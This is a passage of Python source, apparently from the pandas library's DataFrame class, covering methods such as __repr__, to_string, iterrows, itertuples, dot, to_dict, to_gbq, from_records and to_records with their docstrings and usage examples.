# the width of the rendered repr
buf = StringIO()
# only care about the stuff we'll actually print out
# and to_string on entire frame may be expensive
d = self
if not (max_rows is None): # unlimited rows
# min of two, where one may be None
d = d.iloc[: min(max_rows, len(d))]
else:
return True
d.to_string(buf=buf)
value = buf.getvalue()
repr_width = max(len(l) for l in value.split("\n"))
return repr_width < width
def _info_repr(self) -> bool:
"""
True if the repr should show the info view.
"""
info_repr_option = get_option("display.large_repr") == "info"
return info_repr_option and not (
self._repr_fits_horizontal_() and self._repr_fits_vertical_()
)
def __repr__(self) -> str:
"""
Return a string representation for a particular DataFrame.
"""
buf = StringIO("")
if self._info_repr():
self.info(buf=buf)
return buf.getvalue()
max_rows = get_option("display.max_rows")
min_rows = get_option("display.min_rows")
max_cols = get_option("display.max_columns")
max_colwidth = get_option("display.max_colwidth")
show_dimensions = get_option("display.show_dimensions")
if get_option("display.expand_frame_repr"):
width, _ = console.get_console_size()
else:
width = None
self.to_string(
buf=buf,
max_rows=max_rows,
min_rows=min_rows,
max_cols=max_cols,
line_width=width,
max_colwidth=max_colwidth,
show_dimensions=show_dimensions,
)
return buf.getvalue()
def _repr_html_(self) -> Optional[str]:
"""
Return a html representation for a particular DataFrame.
Mainly for IPython notebook.
"""
if self._info_repr():
buf = StringIO("")
self.info(buf=buf)
# need to escape the <class>, should be the first line.
val = buf.getvalue().replace("<", r"<", 1)
val = val.replace(">", r">", 1)
return "<pre>" + val + "</pre>"
if get_option("display.notebook_repr_html"):
max_rows = get_option("display.max_rows")
min_rows = get_option("display.min_rows")
max_cols = get_option("display.max_columns")
show_dimensions = get_option("display.show_dimensions")
formatter = fmt.DataFrameFormatter(
self,
columns=None,
col_space=None,
na_rep="NaN",
formatters=None,
float_format=None,
sparsify=None,
justify=None,
index_names=True,
header=True,
index=True,
bold_rows=True,
escape=True,
max_rows=max_rows,
min_rows=min_rows,
max_cols=max_cols,
show_dimensions=show_dimensions,
decimal=".",
table_id=None,
render_links=False,
)
return formatter.to_html(notebook=True)
else:
return None
@Substitution(
header_type="bool or sequence",
header="Write out the column names. If a list of strings "
"is given, it is assumed to be aliases for the "
"column names",
col_space_type="int, list or dict of int",
col_space="The minimum width of each column",
)
@Substitution(shared_params=fmt.common_docstring, returns=fmt.return_docstring)
def to_string(
self,
buf: Optional[FilePathOrBuffer[str]] = None,
columns: Optional[Sequence[str]] = None,
col_space: Optional[int] = None,
header: Union[bool, Sequence[str]] = True,
index: bool = True,
na_rep: str = "NaN",
formatters: Optional[fmt.FormattersType] = None,
float_format: Optional[fmt.FloatFormatType] = None,
sparsify: Optional[bool] = None,
index_names: bool = True,
justify: Optional[str] = None,
max_rows: Optional[int] = None,
min_rows: Optional[int] = None,
max_cols: Optional[int] = None,
show_dimensions: bool = False,
decimal: str = ".",
line_width: Optional[int] = None,
max_colwidth: Optional[int] = None,
encoding: Optional[str] = None,
) -> Optional[str]:
"""
Render a DataFrame to a console-friendly tabular output.
%(shared_params)s
line_width : int, optional
Width to wrap a line in characters.
max_colwidth : int, optional
Max width to truncate each column in characters. By default, no limit.
.. versionadded:: 1.0.0
encoding : str, default "utf-8"
Set character encoding.
.. versionadded:: 1.0
%(returns)s
See Also
--------
to_html : Convert DataFrame to HTML.
Examples
--------
>>> d = {'col1': [1, 2, 3], 'col2': [4, 5, 6]}
>>> df = pd.DataFrame(d)
>>> print(df.to_string())
col1 col2
0 1 4
1 2 5
2 3 6
"""
from pandas import option_context
with option_context("display.max_colwidth", max_colwidth):
formatter = fmt.DataFrameFormatter(
self,
columns=columns,
col_space=col_space,
na_rep=na_rep,
formatters=formatters,
float_format=float_format,
sparsify=sparsify,
justify=justify,
index_names=index_names,
header=header,
index=index,
min_rows=min_rows,
max_rows=max_rows,
max_cols=max_cols,
show_dimensions=show_dimensions,
decimal=decimal,
line_width=line_width,
)
return formatter.to_string(buf=buf, encoding=encoding)
# ----------------------------------------------------------------------
@property
def style(self) -> Styler:
"""
Returns a Styler object.
Contains methods for building a styled HTML representation of the DataFrame.
See Also
--------
io.formats.style.Styler : Helps style a DataFrame or Series according to the
data with HTML and CSS.
"""
from pandas.io.formats.style import Styler
return Styler(self)
_shared_docs[
"items"
] = r"""
Iterate over (column name, Series) pairs.
Iterates over the DataFrame columns, returning a tuple with
the column name and the content as a Series.
Yields
------
label : object
The column names for the DataFrame being iterated over.
content : Series
The column entries belonging to each label, as a Series.
See Also
--------
DataFrame.iterrows : Iterate over DataFrame rows as
(index, Series) pairs.
DataFrame.itertuples : Iterate over DataFrame rows as namedtuples
of the values.
Examples
--------
>>> df = pd.DataFrame({'species': ['bear', 'bear', 'marsupial'],
... 'population': [1864, 22000, 80000]},
... index=['panda', 'polar', 'koala'])
>>> df
species population
panda bear 1864
polar bear 22000
koala marsupial 80000
>>> for label, content in df.items():
... print(f'label: {label}')
... print(f'content: {content}', sep='\n')
...
label: species
content:
panda bear
polar bear
koala marsupial
Name: species, dtype: object
label: population
content:
panda 1864
polar 22000
koala 80000
Name: population, dtype: int64
"""
@Appender(_shared_docs["items"])
def items(self) -> Iterable[Tuple[Label, Series]]:
if self.columns.is_unique and hasattr(self, "_item_cache"):
for k in self.columns:
yield k, self._get_item_cache(k)
else:
for i, k in enumerate(self.columns):
yield k, self._ixs(i, axis=1)
@Appender(_shared_docs["items"])
def iteritems(self) -> Iterable[Tuple[Label, Series]]:
yield from self.items()
def iterrows(self) -> Iterable[Tuple[Label, Series]]:
"""
Iterate over DataFrame rows as (index, Series) pairs.
Yields
------
index : label or tuple of label
The index of the row. A tuple for a `MultiIndex`.
data : Series
The data of the row as a Series.
it : generator
A generator that iterates over the rows of the frame.
See Also
--------
DataFrame.itertuples : Iterate over DataFrame rows as namedtuples of the values.
DataFrame.items : Iterate over (column name, Series) pairs.
Notes
-----
1. Because ``iterrows`` returns a Series for each row,
it does **not** preserve dtypes across the rows (dtypes are
preserved across columns for DataFrames). For example,
>>> df = pd.DataFrame([[1, 1.5]], columns=['int', 'float'])
>>> row = next(df.iterrows())[1]
>>> row
int 1.0
float 1.5
Name: 0, dtype: float64
>>> print(row['int'].dtype)
float64
>>> print(df['int'].dtype)
int64
To preserve dtypes while iterating over the rows, it is better
to use :meth:`itertuples` which returns namedtuples of the values
and which is generally faster than ``iterrows``.
2. You should **never modify** something you are iterating over.
This is not guaranteed to work in all cases. Depending on the
data types, the iterator returns a copy and not a view, and writing
to it will have no effect.
"""
columns = self.columns
klass = self._constructor_sliced
for k, v in zip(self.index, self.values):
s = klass(v, index=columns, name=k)
yield k, s
def itertuples(self, index: bool = True, name: Optional[str] = "Pandas"):
"""
Iterate over DataFrame rows as namedtuples.
Parameters
----------
index : bool, default True
If True, return the index as the first element of the tuple.
name : str or None, default "Pandas"
The name of the returned namedtuples or None to return regular
tuples.
Returns
-------
iterator
An object to iterate over namedtuples for each row in the
DataFrame with the first field possibly being the index and
following fields being the column values.
See Also
--------
DataFrame.iterrows : Iterate over DataFrame rows as (index, Series)
pairs.
DataFrame.items : Iterate over (column name, Series) pairs.
Notes
-----
The column names will be renamed to positional names if they are
invalid Python identifiers, repeated, or start with an underscore.
On python versions < 3.7 regular tuples are returned for DataFrames
with a large number of columns (>254).
Examples
--------
>>> df = pd.DataFrame({'num_legs': [4, 2], 'num_wings': [0, 2]},
... index=['dog', 'hawk'])
>>> df
num_legs num_wings
dog 4 0
hawk 2 2
>>> for row in df.itertuples():
... print(row)
...
Pandas(Index='dog', num_legs=4, num_wings=0)
Pandas(Index='hawk', num_legs=2, num_wings=2)
By setting the `index` parameter to False we can remove the index
as the first element of the tuple:
>>> for row in df.itertuples(index=False):
... print(row)
...
Pandas(num_legs=4, num_wings=0)
Pandas(num_legs=2, num_wings=2)
With the `name` parameter set we set a custom name for the yielded
namedtuples:
>>> for row in df.itertuples(name='Animal'):
... print(row)
...
Animal(Index='dog', num_legs=4, num_wings=0)
Animal(Index='hawk', num_legs=2, num_wings=2)
"""
arrays = []
fields = list(self.columns)
if index:
arrays.append(self.index)
fields.insert(0, "Index")
# use integer indexing because of possible duplicate column names
arrays.extend(self.iloc[:, k] for k in range(len(self.columns)))
if name is not None:
# https://github.com/python/mypy/issues/9046
# error: namedtuple() expects a string literal as the first argument
itertuple = collections.namedtuple( # type: ignore[misc]
name, fields, rename=True
)
return map(itertuple._make, zip(*arrays))
# fallback to regular tuples
return zip(*arrays)
def __len__(self) -> int:
"""
Returns length of info axis, but here we use the index.
"""
return len(self.index)
def dot(self, other):
"""
Compute the matrix multiplication between the DataFrame and other.
This method computes the matrix product between the DataFrame and the
values of an other Series, DataFrame or a numpy array.
It can also be called using ``self @ other`` in Python >= 3.5.
Parameters
----------
other : Series, DataFrame or array-like
The other object to compute the matrix product with.
Returns
-------
Series or DataFrame
If other is a Series, return the matrix product between self and
other as a Series. If other is a DataFrame or a numpy.array, return
the matrix product of self and other in a DataFrame of a np.array.
See Also
--------
Series.dot: Similar method for Series.
Notes
-----
The dimensions of DataFrame and other must be compatible in order to
compute the matrix multiplication. In addition, the column names of
DataFrame and the index of other must contain the same values, as they
will be aligned prior to the multiplication.
The dot method for Series computes the inner product, instead of the
matrix product here.
Examples
--------
Here we multiply a DataFrame with a Series.
>>> df = pd.DataFrame([[0, 1, -2, -1], [1, 1, 1, 1]])
>>> s = pd.Series([1, 1, 2, 1])
>>> df.dot(s)
0 -4
1 5
dtype: int64
Here we multiply a DataFrame with another DataFrame.
>>> other = pd.DataFrame([[0, 1], [1, 2], [-1, -1], [2, 0]])
>>> df.dot(other)
0 1
0 1 4
1 2 2
Note that the dot method give the same result as @
>>> df @ other
0 1
0 1 4
1 2 2
The dot method works also if other is an np.array.
>>> arr = np.array([[0, 1], [1, 2], [-1, -1], [2, 0]])
>>> df.dot(arr)
0 1
0 1 4
1 2 2
Note how shuffling of the objects does not change the result.
>>> s2 = s.reindex([1, 0, 2, 3])
>>> df.dot(s2)
0 -4
1 5
dtype: int64
"""
if isinstance(other, (Series, DataFrame)):
common = self.columns.union(other.index)
if len(common) > len(self.columns) or len(common) > len(other.index):
raise ValueError("matrices are not aligned")
left = self.reindex(columns=common, copy=False)
right = other.reindex(index=common, copy=False)
lvals = left.values
rvals = right._values
else:
left = self
lvals = self.values
rvals = np.asarray(other)
if lvals.shape[1] != rvals.shape[0]:
raise ValueError(
f"Dot product shape mismatch, {lvals.shape} vs {rvals.shape}"
)
if isinstance(other, DataFrame):
return self._constructor(
np.dot(lvals, rvals), index=left.index, columns=other.columns
)
elif isinstance(other, Series):
return self._constructor_sliced(np.dot(lvals, rvals), index=left.index)
elif isinstance(rvals, (np.ndarray, Index)):
result = np.dot(lvals, rvals)
if result.ndim == 2:
return self._constructor(result, index=left.index)
else:
return self._constructor_sliced(result, index=left.index)
else: # pragma: no cover
raise TypeError(f"unsupported type: {type(other)}")
def __matmul__(self, other):
"""
Matrix multiplication using binary `@` operator in Python>=3.5.
"""
return self.dot(other)
def __rmatmul__(self, other):
"""
Matrix multiplication using binary `@` operator in Python>=3.5.
"""
try:
return self.T.dot(np.transpose(other)).T
except ValueError as err:
if "shape mismatch" not in str(err):
raise
# GH#21581 give exception message for original shapes
msg = f"shapes {np.shape(other)} and {self.shape} not aligned"
raise ValueError(msg) from err
# ----------------------------------------------------------------------
# IO methods (to / from other formats)
@classmethod
def from_dict(cls, data, orient="columns", dtype=None, columns=None) -> DataFrame:
"""
Construct DataFrame from dict of array-like or dicts.
Creates DataFrame object from dictionary by columns or by index
allowing dtype specification.
Parameters
----------
data : dict
Of the form {field : array-like} or {field : dict}.
orient : {'columns', 'index'}, default 'columns'
The "orientation" of the data. If the keys of the passed dict
should be the columns of the resulting DataFrame, pass 'columns'
(default). Otherwise if the keys should be rows, pass 'index'.
dtype : dtype, default None
Data type to force, otherwise infer.
columns : list, default None
Column labels to use when ``orient='index'``. Raises a ValueError
if used with ``orient='columns'``.
Returns
-------
DataFrame
See Also
--------
DataFrame.from_records : DataFrame from structured ndarray, sequence
of tuples or dicts, or DataFrame.
DataFrame : DataFrame object creation using constructor.
Examples
--------
By default the keys of the dict become the DataFrame columns:
>>> data = {'col_1': [3, 2, 1, 0], 'col_2': ['a', 'b', 'c', 'd']}
>>> pd.DataFrame.from_dict(data)
col_1 col_2
0 3 a
1 2 b
2 1 c
3 0 d
Specify ``orient='index'`` to create the DataFrame using dictionary
keys as rows:
>>> data = {'row_1': [3, 2, 1, 0], 'row_2': ['a', 'b', 'c', 'd']}
>>> pd.DataFrame.from_dict(data, orient='index')
0 1 2 3
row_1 3 2 1 0
row_2 a b c d
When using the 'index' orientation, the column names can be
specified manually:
>>> pd.DataFrame.from_dict(data, orient='index',
... columns=['A', 'B', 'C', 'D'])
A B C D
row_1 3 2 1 0
row_2 a b c d
"""
index = None
orient = orient.lower()
if orient == "index":
if len(data) > 0:
# TODO speed up Series case
if isinstance(list(data.values())[0], (Series, dict)):
data = _from_nested_dict(data)
else:
data, index = list(data.values()), list(data.keys())
elif orient == "columns":
if columns is not None:
raise ValueError("cannot use columns parameter with orient='columns'")
else: # pragma: no cover
raise ValueError("only recognize index or columns for orient")
return cls(data, index=index, columns=columns, dtype=dtype)
def to_numpy(
self, dtype=None, copy: bool = False, na_value=lib.no_default
) -> np.ndarray:
"""
Convert the DataFrame to a NumPy array.
.. versionadded:: 0.24.0
By default, the dtype of the returned array will be the common NumPy
dtype of all types in the DataFrame. For example, if the dtypes are
``float16`` and ``float32``, the results dtype will be ``float32``.
This may require copying data and coercing values, which may be
expensive.
Parameters
----------
dtype : str or numpy.dtype, optional
The dtype to pass to :meth:`numpy.asarray`.
copy : bool, default False
Whether to ensure that the returned value is not a view on
another array. Note that ``copy=False`` does not *ensure* that
``to_numpy()`` is no-copy. Rather, ``copy=True`` ensure that
a copy is made, even if not strictly necessary.
na_value : Any, optional
The value to use for missing values. The default value depends
on `dtype` and the dtypes of the DataFrame columns.
.. versionadded:: 1.1.0
Returns
-------
numpy.ndarray
See Also
--------
Series.to_numpy : Similar method for Series.
Examples
--------
>>> pd.DataFrame({"A": [1, 2], "B": [3, 4]}).to_numpy()
array([[1, 3],
[2, 4]])
With heterogeneous data, the lowest common type will have to
be used.
>>> df = pd.DataFrame({"A": [1, 2], "B": [3.0, 4.5]})
>>> df.to_numpy()
array([[1. , 3. ],
[2. , 4.5]])
For a mix of numeric and non-numeric types, the output array will
have object dtype.
>>> df['C'] = pd.date_range('2000', periods=2)
>>> df.to_numpy()
array([[1, 3.0, Timestamp('2000-01-01 00:00:00')],
[2, 4.5, Timestamp('2000-01-02 00:00:00')]], dtype=object)
"""
self._consolidate_inplace()
result = self._mgr.as_array(
transpose=self._AXIS_REVERSED, dtype=dtype, copy=copy, na_value=na_value
)
if result.dtype is not dtype:
result = np.array(result, dtype=dtype, copy=False)
return result
def to_dict(self, orient="dict", into=dict):
"""
Convert the DataFrame to a dictionary.
The type of the key-value pairs can be customized with the parameters
(see below).
Parameters
----------
orient : str {'dict', 'list', 'series', 'split', 'records', 'index'}
Determines the type of the values of the dictionary.
- 'dict' (default) : dict like {column -> {index -> value}}
- 'list' : dict like {column -> [values]}
- 'series' : dict like {column -> Series(values)}
- 'split' : dict like
{'index' -> [index], 'columns' -> [columns], 'data' -> [values]}
- 'records' : list like
[{column -> value}, ... , {column -> value}]
- 'index' : dict like {index -> {column -> value}}
Abbreviations are allowed. `s` indicates `series` and `sp`
indicates `split`.
into : class, default dict
The collections.abc.Mapping subclass used for all Mappings
in the return value. Can be the actual class or an empty
instance of the mapping type you want. If you want a
collections.defaultdict, you must pass it initialized.
Returns
-------
dict, list or collections.abc.Mapping
Return a collections.abc.Mapping object representing the DataFrame.
The resulting transformation depends on the `orient` parameter.
See Also
--------
DataFrame.from_dict: Create a DataFrame from a dictionary.
DataFrame.to_json: Convert a DataFrame to JSON format.
Examples
--------
>>> df = pd.DataFrame({'col1': [1, 2],
... 'col2': [0.5, 0.75]},
... index=['row1', 'row2'])
>>> df
col1 col2
row1 1 0.50
row2 2 0.75
>>> df.to_dict()
{'col1': {'row1': 1, 'row2': 2}, 'col2': {'row1': 0.5, 'row2': 0.75}}
You can specify the return orientation.
>>> df.to_dict('series')
{'col1': row1 1
row2 2
Name: col1, dtype: int64,
'col2': row1 0.50
row2 0.75
Name: col2, dtype: float64}
>>> df.to_dict('split')
{'index': ['row1', 'row2'], 'columns': ['col1', 'col2'],
'data': [[1, 0.5], [2, 0.75]]}
>>> df.to_dict('records')
[{'col1': 1, 'col2': 0.5}, {'col1': 2, 'col2': 0.75}]
>>> df.to_dict('index')
{'row1': {'col1': 1, 'col2': 0.5}, 'row2': {'col1': 2, 'col2': 0.75}}
You can also specify the mapping type.
>>> from collections import OrderedDict, defaultdict
>>> df.to_dict(into=OrderedDict)
OrderedDict([('col1', OrderedDict([('row1', 1), ('row2', 2)])),
('col2', OrderedDict([('row1', 0.5), ('row2', 0.75)]))])
If you want a `defaultdict`, you need to initialize it:
>>> dd = defaultdict(list)
>>> df.to_dict('records', into=dd)
[defaultdict(<class 'list'>, {'col1': 1, 'col2': 0.5}),
defaultdict(<class 'list'>, {'col1': 2, 'col2': 0.75})]
"""
if not self.columns.is_unique:
warnings.warn(
"DataFrame columns are not unique, some columns will be omitted.",
UserWarning,
stacklevel=2,
)
# GH16122
into_c = com.standardize_mapping(into)
orient = orient.lower()
# GH32515
if orient.startswith(("d", "l", "s", "r", "i")) and orient not in {
"dict",
"list",
"series",
"split",
"records",
"index",
}:
warnings.warn(
"Using short name for 'orient' is deprecated. Only the "
"options: ('dict', list, 'series', 'split', 'records', 'index') "
"will be used in a future version. Use one of the above "
"to silence this warning.",
FutureWarning,
)
if orient.startswith("d"):
orient = "dict"
elif orient.startswith("l"):
orient = "list"
elif orient.startswith("sp"):
orient = "split"
elif orient.startswith("s"):
orient = "series"
elif orient.startswith("r"):
orient = "records"
elif orient.startswith("i"):
orient = "index"
if orient == "dict":
return into_c((k, v.to_dict(into)) for k, v in self.items())
elif orient == "list":
return into_c((k, v.tolist()) for k, v in self.items())
elif orient == "split":
return into_c(
(
("index", self.index.tolist()),
("columns", self.columns.tolist()),
(
"data",
[
list(map(com.maybe_box_datetimelike, t))
for t in self.itertuples(index=False, name=None)
],
),
)
)
elif orient == "series":
return into_c((k, com.maybe_box_datetimelike(v)) for k, v in self.items())
elif orient == "records":
columns = self.columns.tolist()
rows = (
dict(zip(columns, row))
for row in self.itertuples(index=False, name=None)
)
return [
into_c((k, com.maybe_box_datetimelike(v)) for k, v in row.items())
for row in rows
]
elif orient == "index":
if not self.index.is_unique:
raise ValueError("DataFrame index must be unique for orient='index'.")
return into_c(
(t[0], dict(zip(self.columns, t[1:])))
for t in self.itertuples(name=None)
)
else:
raise ValueError(f"orient '{orient}' not understood")
def to_gbq(
self,
destination_table,
project_id=None,
chunksize=None,
reauth=False,
if_exists="fail",
auth_local_webserver=False,
table_schema=None,
location=None,
progress_bar=True,
credentials=None,
) -> None:
"""
Write a DataFrame to a Google BigQuery table.
This function requires the `pandas-gbq package
<https://pandas-gbq.readthedocs.io>`__.
See the `How to authenticate with Google BigQuery
<https://pandas-gbq.readthedocs.io/en/latest/howto/authentication.html>`__
guide for authentication instructions.
Parameters
----------
destination_table : str
Name of table to be written, in the form ``dataset.tablename``.
project_id : str, optional
Google BigQuery Account project ID. Optional when available from
the environment.
chunksize : int, optional
Number of rows to be inserted in each chunk from the dataframe.
Set to ``None`` to load the whole dataframe at once.
reauth : bool, default False
Force Google BigQuery to re-authenticate the user. This is useful
if multiple accounts are used.
if_exists : str, default 'fail'
Behavior when the destination table exists. Value can be one of:
``'fail'``
If table exists raise pandas_gbq.gbq.TableCreationError.
``'replace'``
If table exists, drop it, recreate it, and insert data.
``'append'``
If table exists, insert data. Create if does not exist.
auth_local_webserver : bool, default False
Use the `local webserver flow`_ instead of the `console flow`_
when getting user credentials.
.. _local webserver flow:
https://google-auth-oauthlib.readthedocs.io/en/latest/reference/google_auth_oauthlib.flow.html#google_auth_oauthlib.flow.InstalledAppFlow.run_local_server
.. _console flow:
https://google-auth-oauthlib.readthedocs.io/en/latest/reference/google_auth_oauthlib.flow.html#google_auth_oauthlib.flow.InstalledAppFlow.run_console
*New in version 0.2.0 of pandas-gbq*.
table_schema : list of dicts, optional
List of BigQuery table fields to which according DataFrame
columns conform to, e.g. ``[{'name': 'col1', 'type':
'STRING'},...]``. If schema is not provided, it will be
generated according to dtypes of DataFrame columns. See
BigQuery API documentation on available names of a field.
*New in version 0.3.1 of pandas-gbq*.
location : str, optional
Location where the load job should run. See the `BigQuery locations
documentation
<https://cloud.google.com/bigquery/docs/dataset-locations>`__ for a
list of available locations. The location must match that of the
target dataset.
*New in version 0.5.0 of pandas-gbq*.
progress_bar : bool, default True
Use the library `tqdm` to show the progress bar for the upload,
chunk by chunk.
*New in version 0.5.0 of pandas-gbq*.
credentials : google.auth.credentials.Credentials, optional
Credentials for accessing Google APIs. Use this parameter to
override default credentials, such as to use Compute Engine
:class:`google.auth.compute_engine.Credentials` or Service
Account :class:`google.oauth2.service_account.Credentials`
directly.
*New in version 0.8.0 of pandas-gbq*.
.. versionadded:: 0.24.0
See Also
--------
pandas_gbq.to_gbq : This function in the pandas-gbq library.
read_gbq : Read a DataFrame from Google BigQuery.
"""
from pandas.io import gbq
gbq.to_gbq(
self,
destination_table,
project_id=project_id,
chunksize=chunksize,
reauth=reauth,
if_exists=if_exists,
auth_local_webserver=auth_local_webserver,
table_schema=table_schema,
location=location,
progress_bar=progress_bar,
credentials=credentials,
)
@classmethod
def from_records(
cls,
data,
index=None,
exclude=None,
columns=None,
coerce_float=False,
nrows=None,
) -> DataFrame:
"""
Convert structured or record ndarray to DataFrame.
Creates a DataFrame object from a structured ndarray, sequence of
tuples or dicts, or DataFrame.
Parameters
----------
data : structured ndarray, sequence of tuples or dicts, or DataFrame
Structured input data.
index : str, list of fields, array-like
Field of array to use as the index, alternately a specific set of
input labels to use.
exclude : sequence, default None
Columns or fields to exclude.
columns : sequence, default None
Column names to use. If the passed data do not have names
associated with them, this argument provides names for the
columns. Otherwise this argument indicates the order of the columns
in the result (any names not found in the data will become all-NA
columns).
coerce_float : bool, default False
Attempt to convert values of non-string, non-numeric objects (like
decimal.Decimal) to floating point, useful for SQL result sets.
nrows : int, default None
Number of rows to read if data is an iterator.
Returns
-------
DataFrame
See Also
--------
DataFrame.from_dict : DataFrame from dict of array-like or dicts.
DataFrame : DataFrame object creation using constructor.
Examples
--------
Data can be provided as a structured ndarray:
>>> data = np.array([(3, 'a'), (2, 'b'), (1, 'c'), (0, 'd')],
... dtype=[('col_1', 'i4'), ('col_2', 'U1')])
>>> pd.DataFrame.from_records(data)
col_1 col_2
0 3 a
1 2 b
2 1 c
3 0 d
Data can be provided as a list of dicts:
>>> data = [{'col_1': 3, 'col_2': 'a'},
... {'col_1': 2, 'col_2': 'b'},
... {'col_1': 1, 'col_2': 'c'},
... {'col_1': 0, 'col_2': 'd'}]
>>> pd.DataFrame.from_records(data)
col_1 col_2
0 3 a
1 2 b
2 1 c
3 0 d
Data can be provided as a list of tuples with corresponding columns:
>>> data = [(3, 'a'), (2, 'b'), (1, 'c'), (0, 'd')]
>>> pd.DataFrame.from_records(data, columns=['col_1', 'col_2'])
col_1 col_2
0 3 a
1 2 b
2 1 c
3 0 d
"""
# Make a copy of the input columns so we can modify it
if columns is not None:
columns = ensure_index(columns)
if is_iterator(data):
if nrows == 0:
return cls()
try:
first_row = next(data)
except StopIteration:
return cls(index=index, columns=columns)
dtype = None
if hasattr(first_row, "dtype") and first_row.dtype.names:
dtype = first_row.dtype
values = [first_row]
if nrows is None:
values += data
else:
values.extend(itertools.islice(data, nrows - 1))
if dtype is not None:
data = np.array(values, dtype=dtype)
else:
data = values
if isinstance(data, dict):
if columns is None:
columns = arr_columns = ensure_index(sorted(data))
arrays = [data[k] for k in columns]
else:
arrays = []
arr_columns_list = []
for k, v in data.items():
if k in columns:
arr_columns_list.append(k)
arrays.append(v)
arrays, arr_columns = reorder_arrays(arrays, arr_columns_list, columns)
elif isinstance(data, (np.ndarray, DataFrame)):
arrays, columns = to_arrays(data, columns)
if columns is not None:
columns = ensure_index(columns)
arr_columns = columns
else:
arrays, arr_columns = to_arrays(data, columns, coerce_float=coerce_float)
arr_columns = ensure_index(arr_columns)
if columns is not None:
columns = ensure_index(columns)
else:
columns = arr_columns
if exclude is None:
exclude = set()
else:
exclude = set(exclude)
result_index = None
if index is not None:
if isinstance(index, str) or not hasattr(index, "__iter__"):
i = columns.get_loc(index)
exclude.add(index)
if len(arrays) > 0:
result_index = Index(arrays[i], name=index)
else:
result_index = Index([], name=index)
else:
try:
index_data = [arrays[arr_columns.get_loc(field)] for field in index]
except (KeyError, TypeError):
# raised by get_loc, see GH#29258
result_index = index
else:
result_index = ensure_index_from_sequences(index_data, names=index)
exclude.update(index)
if any(exclude):
arr_exclude = [x for x in exclude if x in arr_columns]
to_remove = [arr_columns.get_loc(col) for col in arr_exclude]
arrays = [v for i, v in enumerate(arrays) if i not in to_remove]
arr_columns = arr_columns.drop(arr_exclude)
columns = columns.drop(exclude)
mgr = arrays_to_mgr(arrays, arr_columns, result_index, columns)
return cls(mgr)
def to_records(
self, index=True, column_dtypes=None, index_dtypes=None
) -> np.recarray:
"""
Convert DataFrame to a NumPy record array.
Index will be included as the first field of the record array if
requested.
Parameters
----------
index : bool, default True
Include index in resulting record array, stored in 'index'
field or using the index label, if set.
column_dtypes : str, type, dict, default None
.. versionadded:: 0.24.0
If a string or type, the data type to store all columns. If
a dictionary, a mapping of column names and indices (zero-indexed)
to specific data types.
index_dtypes : str, type, dict, default None
.. versionadded:: 0.24.0
If a string or type, the data type to store all index levels. If
a dictionary, a mapping of index level names and indices
(zero-indexed) to specific data types.
This mapping is applied only if `index=True`.
Returns
-------
numpy.recarray
NumPy ndarray with the DataFrame labels as fields and each row
of the DataFrame as entries.
See Also
--------
DataFrame.from_records: Convert structured or record ndarray
to DataFrame.
numpy.recarray: An ndarray that allows field access using
attributes, analogous to typed columns in a
spreadsheet.
Examples
--------
>>> df = pd.DataFrame({'A': [1, 2], 'B': [0.5, 0.75]},
... index=['a', 'b'])
>>> df
A B
a 1 0.50
b 2 0.75
>>> df.to_records()
rec.array([('a', 1, 0.5 ), ('b', 2, 0.75)],
dtype=[('index', 'O'), ('A', '<i8'), ('B', '<f8')])
If the DataFrame index has no label then the recarray field name
is set to 'index'. If the index has a label then this is used as the
field name:
>>> df.index = df.index.rename("I")
>>> df.to_records()
rec.array([('a', 1, 0.5 ), ('b', 2, 0.75)],
dtype=[('I', 'O'), ('A', '<i8'), ('B', '<f8')])
The index can be excluded from the record array:
>>> df.to_records(index=False)
rec.array([(1, 0.5 ), (2, 0.75)],
dtype=[('A', '<i8'), ('B', '<f8')])
Data types can be specified for the columns:
>>> df.to_records(column_dtypes={"A": "int32"})
rec.array([('a', 1, 0.5 ), ('b', 2, 0.75)],
dtype=[('I', 'O'), ('A', '<i4'), ('B', '<f8')])
As well as for the index:
>>> df.to_records(index_dtypes="<S2")
rec.array([(b'a', 1, 0.5 ), (b'b', 2, 0.75)],
dtype=[('I', 'S2'), ('A', '<i8'), ('B', '<f8')])
>>> index_dtypes = f"<S{df.index.str.len().max()}"
>>> df.to_records(index_dtypes=index_dtypes)
rec.array([(b'a', 1, 0.5 ), (b'b', 2, 0.75)],
dtype=[('I', 'S1'), ('A', '<i8'), ('B', '<f8')])
"""
if index:
if isinstance(self.index, MultiIndex):
# array of tuples to numpy cols. copy copy copy
ix_vals = list(map(np.array, zip(*self.index._values)))
else:
ix_vals = [self.index.values]
arrays = ix_vals + [
np.asarray(self.iloc[:, i]) for i in range(len(self.columns))
]
count = 0
index_names = list(self.index.names)
if isinstance(self.index, MultiIndex):
for i, n in enumerate(index_names):
if n is None:
index_names[i] = f"level_{count}"
count += 1
elif index_names[0] is None:
index_names = ["index"]
names = [str(name) for name in itertools.chain(index_names, self.columns)]
else:
arrays = [np.asarray(self.iloc[:, i]) for i in range(len(self.columns))]
names = [str(c) for c in self.columns]
index_names = []
index_len = len(index_names)
formats = []
for i, v in enumerate(arrays):
index = i
# When the names and arrays are collected, we
# first collect those in the DataFrame's index,
# followed by those in its columns.
#
# Thus, the total length of the array is:
# len(index_names) + len(DataFrame.columns).
#
# This check allows us to see whether we are
# handling a name / array in the index or column.
if index < index_len:
dtype_mapping = index_dtypes
name = index_names[index]
else:
index -= index_len
dtype_mapping = column_dtypes
name = self.columns[index]
# We have a dictionary, so we get the data type
# associated with the index or column (which can
# be denoted by its name in the DataFrame or its
# position in DataFrame's array of indices or
# columns, whichever is applicable.
if is_dict_like(dtype_mapping):
if name in dtype_mapping:
dtype_mapping = dtype_mapping[name]
elif index in dtype_mapping:
dtype_mapping = dtype_mapping[index]
else:
dtype_mapping = None
# If no mapping can be found, use the array's
# dtype attribute for formatting.
#
# A valid dtype must either be a type or
# string naming a type.
if dtype_mapping is None:
formats.append(v.dtype)
elif isinstance(dtype_mapping, (type, np.dtype, str)):
formats.append(dtype_mapping)
else:
element = "row" if i < index_len else "column"
msg = f"Invalid dtype {dtype_mapping} specified for {element} {name}"
raise ValueError(msg)
return np.rec.fromarrays(arrays, dtype={"names": names, "formats": formats})
@classmethod
def _from_arrays(
cls,
arrays,
columns,
index,
dtype: Optional[Dtype] = None,
verify_integrity: bool = True,
) -> DataFrame:
"""
Create DataFrame from a list of arrays corresponding to the columns.
Parameters
----------
arrays : list-like of arrays
Each array in the list corresponds to one column, in order.
columns : list-like, Index
The column names for the resulting DataFrame.
index : list-like, Index
The rows labels for the resulting DataFrame.
dtype : dtype, optional
Optional dtype to enforce for all arrays.
verify_integrity : bool, default True
Validate and homogenize all input. If set to False, it is assumed
